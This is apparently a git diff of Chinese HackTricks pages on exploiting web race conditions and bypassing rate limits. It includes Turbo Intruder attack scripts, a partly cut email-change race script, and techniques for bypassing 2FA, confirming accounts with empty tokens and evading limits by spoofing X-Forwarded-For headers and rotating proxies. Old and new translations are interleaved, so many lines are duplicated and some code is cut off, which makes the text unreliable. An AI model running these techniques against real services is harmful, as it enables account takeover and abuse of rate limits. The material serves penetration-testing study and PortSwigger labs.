* 如果您想在 HackTricks 中看到您的**公司广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS Family**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% hint style="warning" %}
要深入了解此技术,请查看原始报告:[https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
{% endhint %}
## 加强竞争条件攻击
{% hint style="warning" %}
要深入了解此技术,请查看原始报告 [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
{% endhint %}
利用竞争条件的主要障碍是确保多个请求同时处理,且它们的处理时间**几乎没有差异—最好小于1毫秒**。
## 增强竞争条件攻击
以下是一些同步请求的技术:
利用竞争条件的主要障碍是确保多个请求同时处理,**处理时间差异非常小——理想情况下,少于 1 毫秒**。
#### HTTP/2 单数据包攻击 vs. HTTP/1.1 最后字节同步
在这里可以找到一些同步请求的技术:
#### HTTP/2 单包攻击与 HTTP/1.1 最后字节同步
* **HTTP/2**:支持通过单个 TCP 连接发送两个请求,减少网络抖动的影响。然而,由于服务器端的变化,两个请求可能不足以实现一致的竞争条件利用。
* **HTTP/1.1 '最后字节同步'**:允许预发送大部分 20-30 个请求的内容,保留一个小片段,然后一起发送,实现同时到达服务器。
* **HTTP/1.1 '最后字节同步'**:允许预发送 20-30 个请求的大部分内容,保留一个小片段,然后一起发送,实现同时到达服务器。
**准备进行最后字节同步** 包括:
**最后字节同步的准备**包括:
1. 发送标题和主体数据,但不包含最后一个字节,不结束流。
2. 初始发送后暂停 100 毫秒。
3. 禁用 TCP\_NODELAY 以利用 Nagle 算法批量处理最终帧。
4. 发送 ping 以热连接。
1. 发送头部和主体数据,去掉最后一个字节而不结束流。
2. 初始发送后暂停 100 毫秒。
3. 禁用 TCP\_NODELAY,以利用 Nagle 算法批处理最后的帧。
4. 发送 ping 以热连接。
随后发送保留的帧应导致它们以单个数据包的形式到达,可通过 Wireshark 进行验证。此方法不适用于通常不涉及竞争条件攻击的静态文件
随后发送的保留帧应以单个数据包到达,可以通过 Wireshark 验证。此方法不适用于静态文件,这些文件通常不涉及 RC 攻击
### 适应服务器架构
了解目标的架构至关重要。前端服务器可能会以不同方式路由请求,影响时间。通过无关紧要的请求进行预先的服务器端连接热身,可能会使请求时间正常化。
了解目标的架构至关重要。前端服务器可能以不同方式路由请求,从而影响时序。通过无关请求进行预热的服务器端连接,可能会使请求时序正常化。
#### 处理基于会话的锁定
像 PHP 的会话处理程序会根据会话对请求进行序列化,可能会隐藏漏洞。为每个请求使用不同的会话令牌可以规避此问题。
像 PHP 的会话处理程序这样的框架按会话序列化请求,可能会掩盖漏洞。为每个请求使用不同的会话令牌可以规避此问题。
#### 克服速率或资源限制
如果连接热无效,通过故意触发 Web 服务器的速率或资源限制延迟,通过洪水式的虚拟请求可能有助于通过引发有利于竞争条件的服务器端延迟来促进单数据包攻击
如果连接热无效,通过大量虚假请求故意触发 Web 服务器的速率或资源限制延迟,可能会通过引发服务器端延迟来促进单包攻击,从而有利于竞争条件
## 攻击示例
* **Tubo Intruder - HTTP2 单数据包攻击1 个端点)**:您可以将请求发送到 **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`),您可以更改请求中要暴力破解的值为 **`%s`**,例如 `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`,然后从下拉菜单中选择 **`examples/race-single-packer-attack.py`**
* **Tubo Intruder - HTTP2 单包攻击 (1 个端点)**:您可以将请求发送到 **Turbo intruder** (`Extensions` -> `Turbo Intruder` -> `Send to Turbo Intruder`),您可以在请求中更改要暴力破解的值 **`%s`**,例如 `csrf=Bn9VQB8OyefIs3ShR2fPESR0FzzulI1d&username=carlos&password=%s`,然后从下拉菜单中选择 **`examples/race-single-packer-attack.py`**
<figure><img src="../.gitbook/assets/image (57).png" alt=""><figcaption></figcaption></figure>
如果您要**发送不同的值**,您可以修改代码,使用从剪贴板中获取的单词列表。
如果您要 **发送不同的值**,您可以使用这个从剪贴板中使用字典的代码进行修改:
```python
passwords = wordlists.clipboard
for password in passwords:
engine.queue(target.req, password, gate='race1')
```
{% hint style="warning" %}
如果网站不支持HTTP2仅支持HTTP1.1),请使用`Engine.THREADED`或`Engine.BURP`,而不是`Engine.BURP2`。
如果网站不支持 HTTP2仅支持 HTTP1.1),请使用 `Engine.THREADED` `Engine.BURP`,而不是 `Engine.BURP2`
{% endhint %}
* **Tubo Intruder - HTTP2数据包攻击(多个端点)**:如果您需要向一个端点发送请求,然后向其他端点发送多个请求以触发RCE您可以修改`race-single-packet-attack.py`脚本,类似于
* **Tubo Intruder - HTTP2 单包攻击(多个端点)**:如果您需要向一个端点发送请求,然后向其他多个端点发送请求以触发 RCE您可以将 `race-single-packet-attack.py` 脚本更改为类似
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
@ -105,16 +106,16 @@ engine.queue(confirmationReq, gate=currentAttempt)
# send all the queued requests for this attempt
engine.openGate(currentAttempt)
```
* 在Burp Suite中**Repeater** 还可以通过新的 '**并行发送组**' 选项使用。
* 它也可以通过 Burp Suite 中新的“**并行发送组**”选项在 **Repeater**使用。
* 对于 **limit-overrun**,您可以在组中**添加相同的请求 50 次**。
* 对于 **connection warming**,您可以在组的**开头**添加一些请求到 Web 服务器的一些非静态部分。
* 要延迟处理**一个请求和另一个请求之间**的过程,在 2 个子状态步骤中,您可以在两个请求之间**添加额外的请求**。
* 对于**多端点**的 RC您可以开始发送**进入隐藏状态的请求**,然后在其后**立即发送 50 个利用隐藏状态的请求**。
* 对于 **connection warming**,您可以在 **组的开始**添加一些请求到 web 服务器的某个非静态部分。
* 对于 **delaying** 处理 **一个请求和另一个请求之间**的过程,您可以在两个请求之间**添加额外的请求**
* 对于 **multi-endpoint** RC您可以开始发送**请求**,该请求**进入隐藏状态**,然后在其后**发送 50 个请求**,这些请求**利用隐藏状态**。
<figure><img src="../.gitbook/assets/image (58).png" alt=""><figcaption></figcaption></figure>
* **自动化 Python 脚本**:此脚本的目标是在持续验证的同时更改用户的电子邮件,直到新电子邮件的验证令牌到达最后一个电子邮件(这是因为在代码中看到了一个 RC其中可以修改电子邮件但是由于指示电子邮件的变量已经填充了第一个电子邮件因此验证发送到旧电子邮件)。\
当在收到的电子邮件中找到单词 "objetivo" 时,我们知道收到了更改电子邮件的验证令牌,然后结束攻击。
* **自动化 python 脚本**:该脚本的目标是更改用户的电子邮件,同时不断验证,直到新电子邮件的验证令牌到达最后一个电子邮件(这是因为在代码中看到一个 RC可以修改电子邮件但验证被发送到旧电子邮件因为指示电子邮件的变量已经用第一个填充)。\
当在收到的电子邮件中找到“objetivo”这个词时我们知道收到了更改电子邮件的验证令牌结束攻击。
```python
# https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun
# Script from victor to solve a HTB challenge
@ -242,13 +243,13 @@ h2_conn.close_connection()
response = requests.get(url, verify=False)
```
### 原始 BF
### Raw BF
在之前的研究之前,这些是一些使用的有效载荷,只是尝试尽快发送数据包以引发 RC
在之前的研究之前,这里有一些用于尽可能快速发送数据包以导致RC的有效载荷
- **Repeater** 检查前一节中的示例。
- **Intruder** 将**请求**发送到**Intruder**,在**选项菜单**中将**线程数**设置为**30**,选择**空有效载荷**作为有效载荷并生成**30**。
- **Turbo Intruder**
* **Repeater:** 查看上一节的示例。
* **Intruder**: 将**请求**发送到**Intruder**,在**选项菜单**中将**线程数**设置为**30**,并选择有效载荷为**Null payloads**生成**30**。
* **Turbo Intruder**
```python
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
@ -295,75 +296,75 @@ print(results)
asyncio.run(main())
```
## **RC方法论**
## **RC Methodology**
### 限制超限/TOCTOU
### Limit-overrun / TOCTOU
这是最基本的一种竞争条件,其中**漏洞**出现在**限制执行某个操作次数的地方**。比如在网店多次使用相同的折扣码。一个非常简单的例子可以在[**这份报告**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)或[**这个漏洞**](https://hackerone.com/reports/759247)**中找到**
这是最基本的竞争条件类型,其中**漏洞**出现在**限制执行某个操作次数**的地方。比如在网上商多次使用相同的折扣码。一个非常简单的例子可以在[**这份报告**](https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43)或[**这个漏洞**](https://hackerone.com/reports/759247)**中找到**
这种攻击有许多变,包括:
这种攻击有许多变,包括:
* 多次兑换礼品卡
* 多次对产品评分
* 超出账户余额提取或转账现金
* 重复使用单个验证码解决方案
* 多次评价产品
* 提取或转移超过账户余额的现金
* 重复使用单个 CAPTCHA 解
* 绕过反暴力破解速率限制
### **隐藏子状态**
### **Hidden substates**
利用复杂的竞争条件通常涉及利用与隐藏或**意外机器子状态**交互的短暂机会。以下是处理此类情况的方法:
利用复杂的竞争条件通常涉及利用与隐藏或**意外机器子状态**交互的短暂机会。以下是处理此问题的方法:
1. **识别潜在的隐藏子状态**
* 首先,确定修改或与关键数据交互的端点,如用户配置文件或密码重置流程。关注:
* **存储**:优先选择处理服务器端持久数据的端点,而不是处理客户端数据的端点。
* **操作**:寻找修改现有数据的操作,这些操作比添加新数据的操作更有可能创建可利用的条件
* **关键性**:成功的攻击通常涉及使用相同标识符(例如用户名或重置令牌)的操作
* 首先确定修改或与关键数据交互的端点,例如用户资料或密码重置过程。重点关注:
* **存储**:优先选择操作服务器端持久数据的端点,而不是处理客户端数据的端点。
* **操作**:寻找更可能创建可利用条件的操作,这些操作会改变现有数据,而不是添加新数据
* **键控**:成功的攻击通常涉及基于相同标识符的操作,例如用户名或重置令牌
2. **进行初步探测**
* 使用竞争条件攻击测试已识别的端点,观察是否有与预期结果不同的情况。意外的响应或应用行为的变化可能表明存在漏洞。
3. **演示漏洞**
* 将攻击范围缩小到利用漏洞所需的最少请求数,通常只需两个。由于涉及精确的时间,这一步可能需要多次尝试或自动化
* 使用竞争条件攻击测试识别的端点,观察是否有任何偏离预期结果的情况。意外的响应或应用程序行为的变化可能表明存在漏洞。
3. **证明漏洞**
* 将攻击缩小到利用漏洞所需的最少请求数量,通常仅为两个。此步骤可能需要多次尝试或自动化,因为涉及精确的时机
### 时间敏感攻击
在定时请求方面的精确性可以揭示漏洞,特别是在安全令牌使用可预测的方法(如时间戳)时。例如,基于时间戳生成密码重置令牌可能允许同时请求相同的令牌。
请求的时机精确性可以揭示漏洞,尤其是在使用可预测的方法(如时间戳)作为安全令牌时。例如,基于时间戳生成密码重置令牌可能允许同时请求相同的令牌。
**利用方法:**
* 使用精确的时间,如单数据包攻击,进行并发密码重置请求。相同的令牌表明存在漏洞。
* 使用精确的时机,例如单个数据包攻击,发起并发的密码重置请求。相同的令牌表明存在漏洞。
**示例:**
* 同时请求两个密码重置令牌并进行比较。匹配的令牌表明令牌生成存在缺陷。
**查看此** [**PortSwigger实验室**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **以尝试此操作。**
**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities) **来尝试这个。**
## 隐藏子状态案例研究
## Hidden substates case studies
### 支付并添加商品
### Pay & add an Item
查看此 [**PortSwigger实验室**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) 了解如何在商店中**支付**并**添加额外**商品,而您**无需为其付款**
查看这个 [**PortSwigger Lab**](https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-insufficient-workflow-validation) 以了解如何在商店中**支付**并**添加一个额外**的你**不需要支付的**物品
### 确认其他电子邮件
### Confirm other emails
这个想法是**验证一个电子邮件地址并同时将其更改为另一个**,以查明平台是否验证了更改后的新电子邮件
这个想法是**同时验证一个电子邮件地址并将其更改为另一个**,以找出平台是否验证新更改的地址
### 将电子邮件更改为2个电子邮件地址基于Cookie
### Change email to 2 emails addresses Cookie based
根据[**这项研究**](https://portswigger.net/research/smashing-the-state-machine)Gitlab容易受到这种方式的接管攻击,因为它可能会**将一个电子邮件的电子邮件验证令牌发送到另一个电子邮件**
根据[**这项研究**](https://portswigger.net/research/smashing-the-state-machine)Gitlab 通过这种方式容易受到接管,因为它可能**将一个电子邮件的** **电子邮件验证令牌发送**到另一个电子邮件
**查看此** [**PortSwigger实验室**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **以尝试此操作。**
**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint) **来尝试这个。**
### 隐藏数据库状态/确认绕过
### Hidden Database states / Confirmation Bypass
如果使用**2个不同的写入**向**数据库中添加信息**,则在**只有第一个数据已写入**数据库的一小部分时间内。例如,创建用户时,**用户名**和**密码**可能会被**写入**,然后写入用于确认新创建帐户的令牌。这意味着在短时间内**用于确认帐户的令牌为空**。
如果使用**2个不同的写入**来**添加** **信息**到**数据库**中,则在**仅写入第一条数据**的短暂时间内存在一个小的时间窗口。例如,在创建用户时,**用户名**和**密码**可能被**写入**,然后**令牌**用于确认新创建的账户被写入。这意味着在短时间内,**确认账户的令牌是空的**。
因此,**注册一个帐户并发送多个带有空令牌的请求**`token=`或`token[]=`或任何其他变体)立即确认帐户可能允许**确认一个您无法控制电子邮件的帐户**。
因此,**注册一个账户并发送多个带有空令牌**`token=`或`token[]=`或任何其他变体)以立即确认账户,可能允许**确认一个你不控制电子邮件的账户**。
**查看此** [**PortSwigger实验室**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **以尝试此操作。**
**查看这个** [**PortSwigger Lab**](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction) **来尝试这个。**
### 绕过2FA
### Bypass 2FA
以下伪代码容易受到竞争条件攻击,因为在**创建会话**时**2FA未强制执行**的非常短的时间内
以下伪代码容易受到竞争条件的影响,因为在创建会话的非常短的时间内,**2FA没有被强制执行**
```python
session['userid'] = user.userid
if user.mfa_enabled:
@ -371,24 +372,24 @@ session['enforce_mfa'] = True
# generate and send MFA code to user
# redirect browser to MFA code entry form
```
### OAuth2永久性
### OAuth2 久持久性
有几个[**OAUth提供商**](https://en.wikipedia.org/wiki/List\_of\_OAuth\_providers)。这些服务将允许您创建一个应用程序并验证提供商已注册的用户。为了做到这一点,**客户端**将需要**允许您的应用程序**访问**OAUth提供商**内部的一些数据。\
因此直到这里只是一个常见的使用google/linkedin/github等登录您会看到一个页面上面写着“_应用程序\<InsertCoolName>想要访问您的信息,您是否允许_”
有几个 [**OAUth 提供者**](https://en.wikipedia.org/wiki/List\_of\_OAuth\_providers)。这些服务允许您创建一个应用程序并验证提供者注册的用户。为此,**客户端**需要**允许您的应用程序**访问其在**OAUth 提供者**中的某些数据。\
到这里为止,只是一个常见的使用 google/linkedin/github 等登录的过程您会看到一个页面提示“_应用程序 \<InsertCoolName> 想要访问您的信息,您想允许吗_”
#### `authorization_code`中的竞争条件
#### `authorization_code` 中的竞争条件
**问题**出现在您**接受**并自动向恶意应用程序发送**`authorization_code`**时。然后,此**应用程序滥用OAUth服务提供商中的竞争条件**,从**`authorization_code`**为您的帐户生成多个AT/RT_认证令牌/刷新令牌_。基本上它将滥用您已经允许应用程序访问您的数据的事实来**创建多个帐户**。然后,如果您**停止允许应用程序访问您的数据一个AT/RT对将被删除但其他AT/RT仍然有效**。
**问题**出现在您**接受**后,自动将**`authorization_code`**发送给恶意应用程序。然后,这个**应用程序利用 OAUth 服务提供者中的竞争条件,从您的账户的**`authorization_code`**生成多个 AT/RT**_身份验证令牌/刷新令牌_。基本上它将利用您已接受该应用程序访问您数据的事实来**创建多个账户**。然后,如果您**停止允许该应用程序访问您的数据,一对 AT/RT 将被删除,但其他的仍然有效**。
#### `Refresh Token`中的竞争条件
#### `Refresh Token` 中的竞争条件
一旦您**获得了有效的RT**,您可以尝试**滥用它生成多个AT/RT**,即使用户取消了恶意应用程序访问其数据的权限,**多个RT仍然有效**
一旦您**获得有效的 RT**,您可以尝试**利用它生成多个 AT/RT**,即使用户取消了恶意应用程序访问其数据的权限,**多个 RT 仍然有效**
## WebSockets中的RC
## **WebSockets 中的 RC**
在[**WS\_RaceCondition\_PoC**](https://github.com/redrays-io/WS\_RaceCondition\_PoC)中您可以找到一个Java PoC用于**并行**发送websocket消息以滥用**Web Sockets中的竞争条件**。
[**WS\_RaceCondition\_PoC**](https://github.com/redrays-io/WS\_RaceCondition\_PoC) 中,您可以找到一个用 Java 编写的 PoC以**并行**发送 websocket 消息,利用**Web Sockets 中的竞争条件**。
## 参考资料
## 参考文献
* [https://hackerone.com/reports/759247](https://hackerone.com/reports/759247)
* [https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html](https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html)
@ -396,24 +397,25 @@ session['enforce_mfa'] = True
* [https://portswigger.net/research/smashing-the-state-machine](https://portswigger.net/research/smashing-the-state-machine)
* [https://portswigger.net/web-security/race-conditions](https://portswigger.net/web-security/race-conditions)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition)可以轻松构建和由全球**最先进**的社区工具驱动的**自动化工作流程**。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}

View file

@ -1,40 +1,41 @@
# 绕过速率限制
# Rate Limit Bypass
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 可以轻松构建和**自动化工作流**,利用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=rate-limit-bypass" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)系列
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 绕过速率限制技术
## Rate limit bypass techniques
### 探索类似的端点
### Exploring Similar Endpoints
应尝试对目标端点的变体执行暴力攻击,例如 `/api/v3/sign-up`,包括 `/Sing-up``/SignUp``/singup``/api/v1/sign-up``/api/sign-up` 等替代选项
应尝试对目标端点的变体进行暴力攻击,例如 `/api/v3/sign-up`,包括 `/Sing-up`、`/SignUp`、`/singup`、`/api/v1/sign-up`、`/api/sign-up` 等替代方案
### 在代码或参数中插入空白字符
### Incorporating Blank Characters in Code or Parameters
将空白字节如 `%00``%0d%0a``%0d``%0a``%09``%0C``%20` 插入代码或参数中可能是一种有用的策略。例如,将参数调整为 `code=1234%0a` 可以通过输入变体来延长尝试,比如向电子邮件地址添加换行符以绕过尝试限制。
在代码或参数中插入空字节,如 `%00`、`%0d%0a`、`%0d`、`%0a`、`%09`、`%0C`、`%20` 可以是一种有效策略。例如,将参数调整为 `code=1234%0a` 允许通过输入的变体扩展尝试,例如在电子邮件地址中添加换行符以绕过尝试限制。
### 通过标头操纵 IP 来源
### Manipulating IP Origin via Headers
修改头以改感知的 IP 来源可以帮助规避基于 IP 的速率限制。诸如 `X-Originating-IP``X-Forwarded-For``X-Remote-IP``X-Remote-Addr``X-Client-IP``X-Host``X-Forwared-Host` 等标头,包括使用多个 `X-Forwarded-For` 实例,可以调整以模拟来自不同 IP 的请求。
修改头以改感知的 IP 来源可以帮助规避基于 IP 的速率限制。可以调整 `X-Originating-IP`、`X-Forwarded-For`、`X-Remote-IP`、`X-Remote-Addr`、`X-Client-IP`、`X-Host`、`X-Forwared-Host` 等头部,包括使用多个 `X-Forwarded-For` 实例,以模拟来自不同 IP 的请求。
```bash
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
@ -48,44 +49,45 @@ X-Forwared-Host: 127.0.0.1
X-Forwarded-For:
X-Forwarded-For: 127.0.0.1
```
### 修改其他标头
### 更改其他头部
建议修改其他请求标头如用户代理和Cookie,因为这些也可以用于识别和跟踪请求模式。更改这些头可以防止识别和跟踪请求者的活动。
建议更改其他请求头,例如用户代理和 cookies,因为这些也可以用于识别和跟踪请求模式。更改这些头可以防止识别和跟踪请求者的活动。
### 利用 API 网关行为
一些 API 网关配置为基于端点和参数的组合应用速率限制。通过改变参数值或向请求添加非重要参数,可以规避网关的速率限制逻辑,使每个请求看起来是独一无二的。例如 `/resetpwd?someparam=1`
某些 API 网关被配置为根据端点和参数的组合应用速率限制。通过改变参数值或向请求中添加不重要的参数,可以绕过网关的速率限制逻辑,使每个请求看起来都是唯一的。例如 `/resetpwd?someparam=1`
### 在每次尝试之前登录您的
### 在每次尝试之前登录您的
在每次尝试之前登录帐户,或每组尝试,可能会重置速率限制计数器。这在测试登录功能时特别有用。利用类似 Burp Suite 中的 Pitchfork 攻击工具,每隔几次尝试轮换凭据,并确保标记了跟随重定向,可以有效地重新启动速率限制计数器。
在每次尝试或每组尝试之前登录账户,可能会重置速率限制计数器。这在测试登录功能时尤其有用。利用像 Burp Suite 这样的工具中的 Pitchfork 攻击,在每几次尝试中轮换凭据,并确保跟随重定向被标记,可以有效地重启速率限制计数器。
### 利用代理网络
部署代理网络以将请求分布到多个 IP 地址可以有效地绕过基于 IP 的速率限制。通过通过各种代理路由流量,每个请求看起来来自不同的源头,削弱速率限制的效果
部署一个代理网络,将请求分散到多个 IP 地址,可以有效绕过基于 IP 的速率限制。通过通过各种代理路由流量,每个请求看起来都来自不同的来源,从而稀释速率限制的有效性
### 将攻击分散到不同帐户或会话中
### 在不同账户或会话之间分散攻击
如果目标系统按照每个帐户或每个会话的基础应用速率限制,将攻击或测试分散到多个帐户或会话中有助于避免检测。这种方法需要管理多个身份或会话令牌,但可以有效地分发负载以保持在允许的限制范围内。
如果目标系统在每个账户或每个会话的基础上应用速率限制,将攻击或测试分散到多个账户或会话可以帮助避免检测。这种方法需要管理多个身份或会话令牌,但可以有效地分散负载,以保持在允许的限制内。
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 **HackTricks****HackTricks Cloud** github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=rate-limit-bypass) 可以轻松构建和 **自动化工作流程**,使用世界上 **最先进** 的社区工具。\
